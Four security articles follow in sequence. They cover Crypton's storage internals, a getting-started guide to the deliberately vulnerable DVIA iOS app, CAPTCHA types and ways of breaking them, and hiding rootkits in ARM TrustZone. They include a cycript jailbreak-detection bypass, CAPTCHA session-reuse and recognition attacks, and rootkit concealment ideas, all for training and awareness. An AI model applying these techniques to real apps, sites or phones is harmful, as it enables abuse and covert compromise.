an accountId is added to the JSON value stored in our session key; this binds our account to the session key. 127.0.0.1:6379> keys * 1) "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq" 127.0.0.1:6379> mget "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq" 1) "{"cookie":{"originalMaxAge":null,"expires":null,"secure":true,"httpOnly":true,"path":"/"}}" 127.0.0.1:6379> mget "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq" 1) "{"cookie":{"originalMaxAge":null,"expires":null,"secure":true,"httpOnly":true,"path":"/"},"accountId":15}" If we save an entry in the database, the contents of the Redis DB will not change, because the actual data is stored in the PostgreSQL database. When we think about it, it makes sense to store session data only in the Redis DB, since the contents of the Redis database does not persist on restarts, since they are kept in memory only—and it would be a shame if our Diary entries were lost because we stored it in Redis database, which was wiped out upon service restart. Therefore, all the data needs to be stored on an actual hard drive in PostgreSQL database. We can also connect to the PostgreSQL database by using the psql command. Remember that, by default, the PostgreSQL user on Ubuntu has a blank default password, so we should be able to connect to the DB without entering a password. In the output below, we’ve connected to the PostgreSQL crypton_test database and displayed all tables with dt command. # sudo -u postgres psql postgres=# connect crypton_test crypton_test=# dt public | account | table | crypton_test_user public | base_keyring | table | crypton_test_user public | container | table | crypton_test_user public | container_record | table | crypton_test_user public | container_session_key | table | crypton_test_user public | container_session_key_share | table | crypton_test_user public | message | table | crypton_test_user public | transaction | table | crypton_test_user public | transaction_add_container | table | crypton_test_user public | transaction_add_container_record | table | crypton_test_user public | transaction_add_container_session_key | table | crypton_test_user public | transaction_add_container_session_key_share | table | crypton_test_user public | transaction_add_message | table | crypton_test_user public | transaction_delete_container | table | crypton_test_user public | transaction_delete_container_session_key_share | table | crypton_test_user public | transaction_delete_message | table | crypton_test_user Let’s create another user by registering temp:temp user. The user should be stored in the account table, which contains the following information after the creation of a new user. Notice there is no password stored anywhere, nor is the password hash stored. crypton_test=# select * from account; account_id | creation_time | username | base_keyring_id | deletion_time ------------+----------------------------+----------+-----------------+--------------- 1 | 2014-03-17 12:41:15.118183 | pizza | 2 | 4 | 2014-03-17 12:41:17.473174 | testuser | 5 | 17 | 2014-03-17 12:54:25.929092 | temp | 18 | We can also search through the PostgreSQL database and we won’t be able to find a stored message entered through the Diary application in clear-text form; everything is encrypted as it should be, which gives us the confirmation we’ve been looking for. We’ve also mentioned that Crypton still has a long way to go, because it’s a young project indeed. One problem occurs if we enter the “admin)’,nname:” as our username. At such point the “logging in” message is displayed on the screen indefinitely. After a while. the user might realize that the application has stopped working and close the browser tab. If we look at the messages being logged in the background we can see the following request, where it’s evident that the request returned 404 Not Found message. This is because every backslash ‘’ character is transformed into a normal slash ‘/’ character, thus changing the URL structure. The same happens if we input the normal slash, which is not transformed, but still changes the URL format. info 404 POST /account/admin)',/nname: The application accepts that after the /account/ there comes the name of the user followed by optional slash, but in our case we’re actually adding another element of the URL, which the application doesn’t recognize. In this use case, the application should notify us that we should be using special characters when inputting username, if special characters are indeed not valid. In case the application wants to allow special characters as part of the username, they should be properly encoded. Conclusion We’ve seen that Crypton is a great project that can take care of security for us when building a cloud application, because it automatically encrypts/decrypts the messages for us, so we can store them in a cloud without revealing any information to the CSP. At this point, I would like to thank SpiderOak for releasing such a great project to open source, and all current developers for doing a good job. Crypton still has a long way to go, so any help from other developers around the world is appreciated and will be gladly accepted. We need to strive toward a safer future, where our data will is securely and privately stored in the cloud by being encrypted and Crypton is one way of achieving it. References [1] Crypton, Getting Started, https://crypton.io/getting-started. Source
-
In this article, I will write about how to get started with Damn Vulnerable iOS Application. Damn Vulnerable iOS App (DVIA) is an iOS application that I wrote to provide a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills in a legal environment. This application covers all the common vulnerabilities found in iOS applications (following OWASP top 10 mobile risks) and contains several challenges that the user can try. Every challenge is coupled with an article that the users can read to learn more on that topic. This application can also be used by absolute beginners in iOS application security as the tutorials that come with DVIA are written keeping beginners in mind. The users can also buy a comprehensive guide of solutions for DVIA if they want. DVIA is also open source and its Github page can be found here. Installing DVIA Note: DVIA only supports IOS 7 devices, older versions of IOS are not supported. DVIA also supports 64 bit devices. Please make sure to download the latest version of DVIA. The very first thing to do is set up an iOS pen-testing environment on your iOS device. You can audit DVIA using simulator as well, but I would recommend trying it out on a device. You can read articles about setting up a pen-testing environment for iOS7. Once you have set up the environment, there is a very good video created by Kyle Levin where he talks about multiple ways of installing DVIA on your device. In any case, here are the text instructions of installing DVIA on your device. You can jump to the next section on Exploring DVIA if you have already installed it on your device. Running on System or Device using Xcode Download the latest source code of Damn Vulnerable iOS Application from here. Note that you will need to have Xcode installed on your computer to build this application. Once you have installed the latest version of Xcode, you can just run the application on your computer by using Xcode and do all the analysis on the simulator if you want. Please open DamnVulnerableIOSApp.xcworkspace to run the project. Don’t use the file DamnVulnerableIOSApp.xcodeproj as the build will fail. This is because DVIA uses Cocoapods. To run the application on your system using iOS simulator, just run the application (Cmd + R) after selecting the target and the application will install on the simulator. To install and run the application on your device using the source code, you need to have a valid provisioning profile. This requires purchasing the iOS developer program that comes at a cost of $99/year. Go to the DVIA Project, Select your Target -> Settings -> Code Signing and make sure the proper Code Signing identity and Provisioning profile are selected. Copying the .app file on device and using uicache Download the .ipa file from the downloads page, change its name from DamnVulnerableIOSApp.ipa to DamnVulnerableIOSApp.zip and unzip this file. This will unzip to a folder named Payload. Inside it, there will be a file named DamnVulnerableIOSApp.app. Then copy the .app file to the /Applications directory on the device using Scp. You can also use sftp or the utility iExplorer to upload this application. Now login as the mobile user, use the command su to get root privileges and give the DVIA binary executable permissions. Then use the exit command to go back as the mobile user, and use the command uicache to install the application. If this doesn’t work, you can reboot the device or try this method again. Using IPA Installer Requires a device running IOS 7 and Appsync installed. Please note that we don’t promote the use of Appsync, and hence this method should only be used as a last alternative. Download the latest IPA of Damn Vulnerable IOS Application here. One of the ways to install the application is by using the terminal utility IPA Installer Console. Make sure you install it on your device. Now sftp into your device and upload the IPA file that we have just downloaded. Now use the command “ipainstaller DamnVulnerableIOSApp.ipa” or “installipa DamnVulnerableIOSApp.ipa” to install the application on your device. Using AppSync Make sure AppSync is installed on your device. To install AppSync on your device, follow these steps. Launch Cydia app on your device Select Manage Select Sources Select Edit Select Add Add the source repo.hackyouriphone.org Now search for AppSync Install AppSync for IOS 7+. Now double click on the ipa file that you just downloaded on your computer. This will add the application to iTunes. Now go to iTunes, select the install option on DVIA application and sync it to your device. This will install the application on your device. Exploring DVIA DVIA comes loaded with a lot of challenges covering most of the common vulnerabilities found in iOS applications. The current list of vulnerabilities and challenges includes: Insecure Data Storage Jailbreak Detection Runtime Manipulation Transport Layer Security Client Side Injection Information Disclosure Broken Cryptography Application Patching Security Decisions via Untrusted input Side channel data leakage You can just swipe from the left in the application and see a list of vulnerabilities and challenges you can have a go at. Since almost every vulnerability comes with a related tutorial, you can read it up to learn more on that specific vulnerability before attempting the challenge. Auditing DVIA Well, let’s try and solve some challenges. You can audit DVIA both on device and the simulator, however I would recommend you do all the auditing on device. Let’s open up the Client Side injection section. Let’s enter a random name and press enter, say Apple. The first challenge is to show a simple alert with injection. It is clear from the above image that the text is added to this UIWebview. If this input is not validated properly, we might be able to inject some Javascript that will get executed in the UIWebview. Let’s enter the following as the input. Awesome, it looks like this injection worked. For the other challenges, you can use Javascript to call native functions on the device. Well, how do you do that ? Let me give you a hint, read about URL schemes and what they are used for. Now let’s move on to some other challenges. Let’s have a look at the Jailbreak Detection section and try to solve the first challenge. Our task is to fool the application into thinking that it is not jailbroken even though we are running the application on a jailbroken device. So let’s ssh into the device and dump the class information for this application by navigating to the folder where the application binary is located and using the command class-dump DamnVulnerableIOSApp . Looks like this method is the one that is used to check whether a device is jailbroken or not. If we modify the implementation of this method to return NO, then our task will be accomplished. Let’s use cycript to overwrite this method’s implementation. First, lets hook into the application by finding the process ID of the application and using the command cycript -p PID. Make sure the application is running in foreground or we won’t be able to hook into this application. Now modify the implementation by using the following command in the cycript interpreter. JailbreakDetectionVC.messages['isJailbroken'] = function () {return NO}; And now, if you tap on the button Jailbreak Test 1 in the application, you will see that the alert says Device is not jailbroken, even though the device I am currently running the application on is actually jailbroken. Similarly, you can try other challenges in the application as well. As I said before, DVIA is open source, however I assume that when you audit the application to solve challenges, you do a black box audit and don’t look at the source code. If you are unable to solve some challenges, you can buy the solutions. The proceeds from this purchase support the DVIA project and give us dedicated time to improve the application, add new challenges, etc. Any feedbacks, comments for the application are welcome. My next aim is to add more challenges and vulnerabilities in DVIA as time progresses. I hope you enjoy using and learning from DVIA as much as I enjoyed developing it . Source
-
Automated tools are used to carry out many security attacks to online services. There are different protection mechanisms to narrow down such attacks and one such mechanism is the usage of CAPTCHA. CAPTCHA or Completely Automated Public Turing test to tell Computers and Humans Apart is a mechanism adopted by many webservers to limit automated access. The term “CAPTCHA” was coined in 2000 by Luis Von Ahn, Manuel Blum, and Nicholas J. Hopper of Carnegie Mellon University, and John Langford of IBM. They are challenge-response tests to ensure that the users are indeed human. The purpose of a CAPTCHA is to block form submissions from spam bots – automated scripts that harvest email addresses from publicly available web forms. A common kind of CAPTCHA used on most websites requires the users to enter the string of characters that appear in a distorted form on the screen. CAPTCHAs are used because of the fact that it is difficult for the computers to extract the text from such a distorted image, whereas it is relatively easy for a human to understand the text hidden behind the distortions. If a CAPTCHA is solved successfully, then it is assumed that the user is human and not a bot. Even if a bot succeeded in solving one of the CAPTCHA, there is no guarantee that it will be successful the next time, since CAPTCHA’s are chosen from a wide variety of selections. Many websites use CAPTCHA to tell Computers and Humans Apart in an attempt to block automated interactions with their sites. These efforts may be crucial to the success of these sites in various ways. For example, Gmail improves its service by blocking access to automated spammers, eBay improves its marketplace by blocking bots from flooding the site with scams, and Facebook limits creation of fraudulent profiles used to spam honest users or cheat at games. The most widely used CAPTCHA schemes use combinations of distorted characters and obfuscation techniques that humans can recognize but that may be difficult for automated scripts. 1. How to create a CAPTCHA To create a CAPTCHA, first look at different ways humans and machines process information. If something falls outside the structure of those instructions, then the computer is not capable to process it. It should be coded with proper instructions, and only then can the information be processed. In case of reCAPTCHA an Optical Character Recognition (OCR) can be used to read the letters from the books and is stored in the database. Then the OCR reports the words that cannot be correctly read by it and these words are given to the users to fill the CAPTCHA. One way to create a CAPTCHA is to pre-determine the images and solutions it will use. This approach requires a collection of CAPTCHA solutions that include all the different varieties. If a spammer managed to find a list of all CAPTCHA solutions, then an application can be created to brute force the CAPTCHA with every possible match. Then that application’s database must contain more than 10K different CAPTCHAs to be within the boundary line of a good CAPTCHA. 2. CAPTCHA Implementation These are the simple guidelines that must be ensured for CAPTCHA implementation. Embeddable CAPTCHAs The easiest implementation of a CAPTCHA to a Website would be to insert a few lines of CAPTCHA code into the Website’s HTML code. An open source CAPTCHA builder can be used which will provide the authentication services remotely. One of the most popular among them is reCAPTCHA project. CAPTCHA Logic First some random texts are generated and some random effects are applied and it is converted into an image. Then the original text is stored somewhere, which is the correct answer to the converted image. This original text can be stored as a server-side session variable, cookie, file, or database entry. The generated CAPTCHA is presented to the user, and prompted to submit the answer. Then a back-end script checks the answer supplied by the user by comparing it with the original text, i.e., the answer. If the value is empty or incorrect, then a new CAPTCHA is generated. It is ensured that users don’t get a second chance to answer the same CAPTCHA. If the answer supplied by the user is correct, then the form post is set as successful and processing can continue. If applicable, the generated CAPTCHA image is deleted. Accessibility It must be accessible and should be based solely on reading text or other visual-perception tasks. If a CAPTCHA prevents visually impaired users from accessing the protected resource, such CAPTCHAs may make a site incompatible with disability access rules in most countries. Any implementation of a CAPTCHA should allow blind users to get around the barrier, for example, by permitting users to opt for an audio or sound CAPTCHA. Image Security CAPTCHA images of text should be distorted randomly before being presented to the user. Many implementations of CAPTCHAs use undistorted text, or text with only minor distortions. These implementations are vulnerable to simple automated attacks. Script Security A high-level of script security should be enabled, and building a secure CAPTCHA code is not easy. In addition to making the images unreadable by computers, the system should ensure that there are no easy ways around it at the script level. One of the steps is that the system must pass the answer to the CAPTCHA in plain text as part of the Web form. Also, systems with a solution to the same CAPTCHA should not be used multiple times. Scalability CAPTCHA should be scalable in the sense that, even after the widespread adoption of the same in a large number of websites, it should provide security. In some CAPTCHA cases, if some of them were adopted in a large number of websites, then their security would become flawed and they would be vulnerable to bot attacks. One of the examples is of a CAPTCHA puzzle asking text-based questions, such as a mathematical question “what is 2+2?. Since a parser could easily be written that would allow bots to bypass this test, such “CAPTCHAs” rely on the fact that few sites use them, and thus that a bot author has no incentive to program their bot to solve that challenge. True CAPTCHAs should be secure even after a significant number of websites adopt them. 3. Types of CAPTCHA Text-Based CAPTCHAs These are simple to implement and are based on some questions that are given to users that can only be solved by a human being. Such questions can be like any of the following: Which word from the list: “claw, generous, verbosity” has “v” as a first letter? What is the color in the list: coat, school, apple, pink or tongue? If yesterday was a Sunday, what is today? Text-based CAPTCHAS also involve text distortion and are classified as follows: reCAPTCHA reCAPTCHA is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher. More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA. This is possible because most OCR programs alert you when a word cannot be read correctly. Each new word that cannot be read correctly by OCR is given to a user in conjunction with another word for which the answer is already known. The user is then asked to read both words. If they solve the one for which the answer is known, the system assumes their answer is correct for the new one. The system then gives the new image to a number of other people to determine, with higher confidence, whether the original answer was correct. Answers to reCAPTCHA challenges are used to digitize textual documents. It’s not easy, but through a sophisticated combination of multiple OCR programs, probabilistic language models, and most importantly the answers from millions of humans on the Internet, reCAPTCHA is able to achieve over 99.5% transcription accuracy at the word level. GIMPY Gimpy works by choosing ten words randomly from a dictionary, and displaying them in a distorted and overlapped manner. It arranges the words in pairs and the each word pair overlaps one another. Then, the users have to type the three correct words to pass the CAPTCHA test. It is one of the more difficult variants of a word-based CAPTCHA. Ez – Gimpy This type of CAPTCHA works by picking words from dictionary, applying it with distortion and cluttered background. Ez- Gimpy can also be said as a simplified variant of Gimpy CAPTCHA. The difference is that it picks only a single word from dictionary. Baffle text Unlike Gimpy variant CAPTCHAs, baffle text produces pronounceable character strings that are not in the English dictionary. This method was developed by Henry Baird at University of California. It produces a random masking to degrade images of non-pronounceable character strings. MSN CAPTCHA The proprietary CAPTCHA of Microsoft that contains eight characters with a combination of upper characters and digits. Graphic-based CAPTCHAs This type of CAPTCHA produces challenges with a combination of pictures or objects that have some similarity for the user to guess around. Bongo CAPTCHA Bongo CAPTCHA uses visual patterns and prompts users to solve the problem. Normally this type of CAPTCHA provides two types of images, and the user is given another image. Then the user has to match the two images with the latter one. PIX PIX contains a large database of labeled images of various concrete objects including horse, flower, house etc. Then the program randomly chooses one of the objects and selects four random images of the same. Then this will be presented to the user and asked about what the picture is of. ESP-PIX This is one of the variants of PIX CAPTCHA, where a picture is selected with word that best describes the image. The important factor is that ESP-PIX is a CAPTCHA script that instead of asking to type letters, requires that you look at a set of pictures and then select the word that best describes all the images. 3D CAPTCHA These are CAPTCHA’s with three-dimensional pictures, which makes it more difficult for the computer to recognize and is easier for a human. The advantage is that any image can be transformed into a CAPTCHA image and it will be easier for humans to solve the 3D CAPTCHA than the text based ones. But the risk in 3D CAPTCHA is that an image analysis tool can be used by a bot to solve it. Image Orientation CAPTCHA This type of CAPTCHA was developed by Google, in which a large database of images is paired with automatic image orientation detectors that can be easily reoriented by the users. Then a social feedback mechanism is given by Google to verify whether the remaining images have a human-recognizable upright orientation. The advantage of this type of CAPTCHA is that it is language independent and does not require text entry. Microsoft ASIRRA or Image recognition CAPTCHA Microsoft ASIRRA (Animal Species Image Recognition for Restricting Access) or Image recognition CAPTCHA contains a database of labelled images provided by petfinder.com. In this, users have to match the images of cat and dog in order to pass the test. Firstly the CAPTCHA was thought of as a success and couldn’t be breached by the computer. But later it was proved that it is not difficult to distinguish a cat and dog by computer. Geometric CAPTCHA This type of CAPTCHA can also be said as a variant of the math CAPTCHA, which gives bot-challenging objectives to humans as well as computers. This CAPTCHA is also breakable by providing random answers and is not secure. Audio-based CAPTCHAs The CAPTCHA picks a word or letters or its combinations and transforms into a downloadable sound clip and insert some type of noise as distortion. This distorted sound clip is presented to users, who are asked to enter the contents after hearing it. Audio-based CAPTCHA utilizes the human ability to recognize the sound, even if added with the distortion. This type of CAPTCHA is mainly intended for vision-impaired people and was proposed by Carnegie Mellon University and is now owned by Google. These sound-based CAPTCHAs have been deployed on Google, Facebook, and Yahoo and so on. An audio CAPTCHA is usually located as part of the same interface as the text CAPTCHA, and is given as an alternative for users with poor vision. The user is normally asked to click on the sound icon, upon which they will hear spoken words that sound rather distorted, or which are placed on top of a noisy background. The disadvantages of audio CAPTCHA is that the noise provided in the background sometimes overwhelms the main message. Google Audio CAPTCHA Video-based CAPTCHAs This type of CAPTCHA uses video or animation techniques which a user is required to watch and give input. One of the top providers of video CAPTCHA is NuCaptcha that provides CAPTCHA implementation using animation techniques in order to make it harder for spam bots to decipher the characters. Its creators claim that NuCaptcha has the highest usability and security levels of any CAPTCHA on the market. NuCaptcha uses patent-pending next generation animated CAPTCHA technology. Testing has shown that animated CAPTCHA puzzles are easier for humans to recognize and solve than static, scrambled CAPTCHA images. NuCaptcha uses patent-pending next generation animated CAPTCHA technology. Testing has shown that animated CAPTCHA puzzles are easier for humans to recognize and solve than static, scrambled CAPTCHA images. 4. Bypassing a CAPTCHA Bypassing a CAPTCHA is a challenging one, because it is not about listing what it says. The core task is to teach a computer how to process information in a way similar to humans. Breaking CAPTCHAs doesn’t mean to concentrate on making computers smarter, but reducing the complexity of the problem posed by the CAPTCHA. For example: an online form is protected using a CAPTCHA that displays English words and the application warps the font slightly, stretching and bending the letters in unpredictable ways. In addition, the CAPTCHA includes a randomly generated background behind the word. A programmer wishing to break this CAPTCHA could approach the problem in phases. Firstly an algorithm should be written; in this one step might be to convert the image in grayscale. That means the application should remove all the color from the image, with one of the levels of obfuscation the CAPTCHA employs. Then, the algorithm should tell the computer to detect patterns in the black and white image. The comparison of each pattern to normal letters should be carried out and it should match with normal letters. If in this case only a few letters are matched, then it might cross reference those letters with a dictionary of English words. Thus the similar ones should be put into the submit field. This is one of the effective ways of bypassing a CAPTCHA. It doesn’t guarantee success all the time. But it can provide an average range of success and thus gives a way to bypass the CAPTCHA. If the program can only match a few of the letters, it might cross reference those letters with a database of English words. Then it would plug in likely candidates into the submit field. This approach can be surprisingly effective. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers. 4.1 Breaking CAPTCHAs using Session ID CAPTCHAs normally don’t delete the session even if the correct answer is entered. This session can be reused and can be used to bypass the CAPTCHA by automating the request to the CAPTCHA. This is done storing the session ID of the CAPTCHA and the CAPTCHA plain text. This process can be automated by resending the session ID and CAPTCHA plain text multiple numbers of times by changing the user data. This automated process can handle multiple requests in a stretch until the session expires, and in case of expiration, manual steps can be used to reconnect with a new session ID and CAPTCHA text. Normally CAPTCHA-breaking software uses image recognition routines to decode CAPTCHA images, and this can be used to bypass and thus make it easy to hack the CAPTCHA images. 4.2 Breaking a visual CAPTCHA Gimpy CAPTCHA is just an application of a general framework that we have used to compare images of everyday objects and even find and track people in video sequences. Locate possible letters at various locations: A shape-matching technique is used to guess the letters in the image by looking at points in the image. Then these points are compared point by point on each of the 26 letters. The comparison is carried out by recognizing the background clutter and deformation of letters. Then the output given is that of 3 to 5 letters per each letter in the image. The first step is to hypothesize a set of candidate letters in the image. This is done using our shape-matching techniques. The method essentially looks at a bunch of points in the image at random, and compares these points to points on each of the 26 letters. The comparison is done in a way that is very robust to background clutter and deformation of the letters. The process usually results in 3-5 candidate letters per actual letter in the image. In the example shown in Fig 5.1, the “p” of profit matches well to both an “o” or a “p”, the border between the “p” and the “r” look a bit like a “u”, and so forth. At this stage we keep many candidates, to be sure we don’t miss anything for later steps. Construct graph of consistent letters: The pair of letters is analyzed to check whether it is consistent or not and these words can be used to form a word. Next, we analyze pairs of letters to see whether or not they are “consistent”, or can be used consecutively to form a word. Look for plausible words in the graph: From the graph, there are multiple words, and this has to be shortlisted to choose the appropriate one. For this we have to select the real words and give them a score to match their individual letters to the image and thus the CAPTCHA can be bypassed. 4.3 Social Engineering attacks on CAPTCHA Trojans combined with social engineering activity can be used to crack the CAPTCHA. A Trojan named TROJ_CAPTCHAR can acts a game and at each stage of the game the user is asked to solve a CAPTCHA. Then the result is relayed to a remote server where a malicious user is provided with the same. Thus the CAPTCHAs of legitimate sites can be solved and the solutions can be matched to bypass the CAPTCHA in an automated manner. 5. Applications of CAPTCHAs CAPTCHAs are used in various applications to identify human users and to restrict access to them. Some of them are: Online Polls Online polls were affected by bots that vote automatically to create large counts to the respective side. They might create a large number of votes which would then falsely represent the poll winner. Thus CAPTCHAs can be used in websites that have polls to protect them from being accessed by bots, and hence increase the reliability of the polls. Blogs and Forums Spam comments on blogs and forums were one the major problems that bloggers and other forums administrators faced. Almost all bloggers are familiar with bots that submit a large number of posts with some URL embedded in order to increase the SEO. CAPTCHAs can be used in order to prevent a bot from commenting on a large number of posts in the blogs. But it doesn’t mean that it will stop a spammer from posting manually in the comment space provided. Email account registration Email service providers like Google and Yahoo were flooded by accounts created by bots. In order to stop these spam accounts, several email service providers and web registration service providers use CAPTCHAs in their account registration page. This is to ensure that no bots intervene in the activity of form filling. Search engine bots Web pages can be kept as unindexed to prevent search engines from finding them easily. An HTML tag can be used to prevent search engine bots from reading web pages. However, this tag doesn’t ensure that search engine bots don’t index them. In order to truly guarantee that bots won’t enter a web site, CAPTCHAs can be used by restricting to only human indexers. Spam Email All over the Internet there are several email addresses embedded in Websites. Bots are used by spammers in order to collect those email addresses and used to forward junk and spam emails. This can be eliminated by using CAPTCHAs to retrieve the full email address. Dictionary Attacks CAPTCHAs can also be used to prevent dictionary attacks in password systems. It prevents a brute force attack from iterating through the entire space of passwords. A CAPTCHA can also be popped up, requiring the user to solve after a certain number of unsuccessful logins. reCAPTCHA (Digitizing Books) reCAPTCHA is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher. More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA. 6. Conclusion Surely CAPTCHA can be used to prevent automated collection or access to Webservers, and there are a lot of issues related to CAPTCHA in cases like text and image distortion that become difficult for humans to solve. There are several issues related with text-based CAPTCHAs like Gimpy. Most commonly the issue arises when there is confusion with the conversion of letters on characters like ‘m’ confused with ‘rn’, and ‘d’ with ‘cl’ etc. Also a language problem also arises when a person who is unfamiliar with English or some other language is presented with a CAPTCHA of the same language. When longer length CAPTCHAs are used, it becomes difficult for users to solve them without any mistakes. Also, the CAPTCHA’s presentation should be carried out in a way that it should not be confused with font color and background color. In the case of audio CAPTCHAs, when a large distortion is provided in the background noise, then it becomes difficult for the users to categorize the original sound and the noise. Also the contents in the audio CAPTCHAs are based on specific language, and if a user is unfamiliar with the pronunciation and style of that specific content, it would become hard to solve it. Audio CAPTCHAs can also cause compatibility issues, and may require the use of Jscript in that particular Webpage. 7. References How CAPTCHA Works - HowStuffWorks http://dspace.cusat.ac.in/jspui/bitstream/123456789/2228/1/CAPTCHA.pdf Text-based CAPTCHA Strengths and Weaknesses Accessible Text CAPTCHA Logic Questions http://www.ijens.org/Vol_11_I_05/117005-8383-IJVIPNS-IJENS.pdf Source
-
While security of mobile operating systems is one of the most researched topics today, exploiting and rootkitting ARM-based devices gets more and more interesting. This article will focus on the exploitation of TEEs (Trusted Execution Environments) running in ARM TrustZone to hide a TrustZone-based-rootkit. First let’s take a look over what we are protecting on our modern mobile phones: We protect our communication – doesn’t matter if it’s calls or text messages Our data – lots of people have documents on their phones (from their businesses, presentations, contracts and so on) Our Credentials – like email passwords, different type of keys, etc. Our Payments – like online wallets (google wallet, yahoo wallet), PayPal, and other bank information. Let’s see what famous rootkits succeeded to collect information from mobiles, and remain hidden for a long time. CarrierIQ Used for logging user keystrokes, recording telephone calls, storing text messages, tracking location and more than that was difficult or impossible to disable. The software’s meant to improve the customer experience, however in nearly every case, CarrierIQ users don’t know about the software’s existence, as it runs hidden in the background and doesn’t require authorized consent to function. This rootkit was discovered by Trevor Eckhart and he demonstrated in a video that CarrierIQ is tracking our data. At the end, his questions are: - Why do key presses submit UI01 & unique key codes? - Why does SMSNotify get called and show to be dispatching text messages to CarrierIQ ? - Why is my Browser data being read, especially HTTPs on my WiFi? - Why is this not opt-in and Why is it so hard to FULLY remove? What you can do? Trevor Eckhartcreated a tool called Logging TestApp which turned into a full security suite and can be used to verify what logging is being done on your phone and where data is going. It will assist you in manually removing parts you do not know are running. Alternatively, the pro version of Logging TestApp -automates everything - and is available in the Android Marketplace for $1 – it has also proven successful in most situations. FinFisher – FinSpy FinSpy is a Remote Monitoring Solution that enables governments, agencies and companies to face the current challenges of monitoring mobiles. It has been proven successful in operations around the world for many years, and valuable intelligence has been gathered about target individuals and organizations. It’s spread by links, email attachments, infected websites. FinFisher was made by a company called Gamma International, and it is marketed as a powerful tool for accessing the computers of suspected criminals and terrorists secretly. Once it has infected your computer, FinFisher is not detected by anti-virus or antispyware software. Some of FinFisher’s capabilities are the following: steals passwords from your computer, allowing access to your e-mail accounts; wiretaps your Skype calls; turns on your computer’s camera and microphone to record conversations and video from the room that you are in. A quick description of the FinSpy tool collected by Privacy International among others and posted on Wikileaks make a series of claims about functionality: Bypassing of 40 regularly tested Antivirus Systems Covert Communication with Headquarters Full Skype Monitoring (Calls, Chats, File Transfers, Video, Contact List) Recording of common communication like Email, Chats and Voice-over-IP Live Surveillance through Webcam and Microphone Country Tracing of Target Silent Extracting of Files from Hard-Disk Process-based Key-logger for faster analysis Live Remote Forensics on Target System Advanced Filters to record only important information Supports most common Operating Systems (Windows, Mac OSX and Linux) Be wary of opening unsolicited attachments received via email, Skype or any other communications mechanism. If you believe that you are being targeted it pays to be especially cautious when downloading files over the Internet, even from links that are purportedly sent by friends. You can find some very well explained articles regarding FinFisher on citizenlab.org (find the links in resources section) Where rootkits are hidden? On mobile phones there are just two places where rootkits can hide with success: CPU and Baseband. On most operating platforms, both CPU and Baseband have full memory access so if you can own the Baseband you actually own the device. Even so, we can find around the CPU and Baseband, a small hardware addition by ARM called TrustZone and I will focus on this for the rest of article. The ARM processor is a 32-bit RISC processor, meaning it is built using the reduced instruction set computer (RISC) instruction set architecture (ISA). ARM processors are microprocessors and are widely used in as many as 98% of mobile phones sold each year. They are also used in personal digital assistants (PDA), digital media and music layers, hand-held gaming systems, calculators, and even computer hard drives. TrustZone is basically a secure chip in your ARM processor that allows the processor to switch into a “secure mode” which hopefully will execute only trusted code. Here are other TrustZone functions: Secure access to screen, keyboard and other peripherals Tries to protect against malwares, Trojans and rootkits So called TEEs (Trusted Execution Environments) run on it. Splits the CPU in two worlds, secure and normal. Communication between both worlds is made via shared memory mappings. Trusted Execution Environmentals is a small operating system running in TrustZone that provides services to the real operating system. To better understand TEEs we can look at Netflix as an example: Requires a device certification For SD, the device just needs to be fast enough to play video For HD, the labels require ‘end-to-end’ DRM, so that the video-stream can’t be grabbed at any time Video decoding running in TrustZone with direct access to screen, no way to record it from Android. The image below by Thomas Roth explains perfectly how the whole system works, connecting the normal world and secure world together Click to Enlarge The SMC is sorted out of the information received from the normal or secure world, store registers of the current world, load new world registers, toggle NS and execute the application. Memory allocation by Thomas Roth Click to Enlarge Normal world can only access its own memory and shared segment, secure world can access everything. The boot process will start the trusted segment first, then the normal segment, as bellow (image by Thomas Roth) Click to Enlarge Basically, the vendor installs a small operating system in a part of the CPU and this OS can do anything. Also third party apps are installed on it as well. Knowing these facts, let’s see what we need to build a rootkit in TrustZone OMAP HS development board. (Open Multimedia Applications Platform) Connectivity and system integration Support best-in-class video, graphics and multimedia performance. Security - OMAP processors support secure boot and run time, Vision Analytics – distributed vision processing, or DVP, framework and includes a programmable DSP. OMAP processors provide hardware and software support for the virtualization and cloud computing Packaging – TI offers OMAP processors in a variety of package options System performance support a range of applications and demands. Quality & reliability – rigorous quality assurance practices and has a zero-DPPM strategy to continuously improve its products. QEMU - Quick EMUlator hosted virtual machine monitor: It emulates central processing units through dynamic binary translation and provides a set of device models, enabling it to run a variety of unmodified guest operating systems. Also provides an accelerated mode for supporting a mixture of binary translation (for kernel code) and native execution (for user code), in the same fashion VMware Workstation and VirtualBox do. QEMU can also be used purely for CPU emulation for user-level processes, allowing applications compiled for one architecture to be run on another. TEE (Trusted Execution Environment) Is used to protect the secure kernel and peripherals from code running in the primary operating system. Supports ARM11 Allows multiple operating systems such as Android, Linux, BSD and other “normal world” OS’s Minimizes memory and system overhead Note* A tutorial about how to create a small virus for android you can find in my References links Supposing you already created your rootkit and have it integrated inside TrustedZone there are few things to keep in mind: Have a different execution environment, separated from the normal OS Be sure you covered your traces in order to keep the access for a long time. Get control over the CPU regularly in order to access user data, and manipulate the memory. How to infect other phones? -using infected apps -via updates -baseband attack How to avoid infection over your phone? Latency Be paranoid Triple check your apps source and be sure you’re installing the apps from trusted vendors. Trevor Eckhart – Xda-developers – Logging TestApp FinFisher – Wikileaks FinFisher spykit exposed by citizenlab.org Bootloader Project – wikipedia page Generic emulator – QEMU Open Virtualization – TEE Create a virus for android HIP13 – Source
-
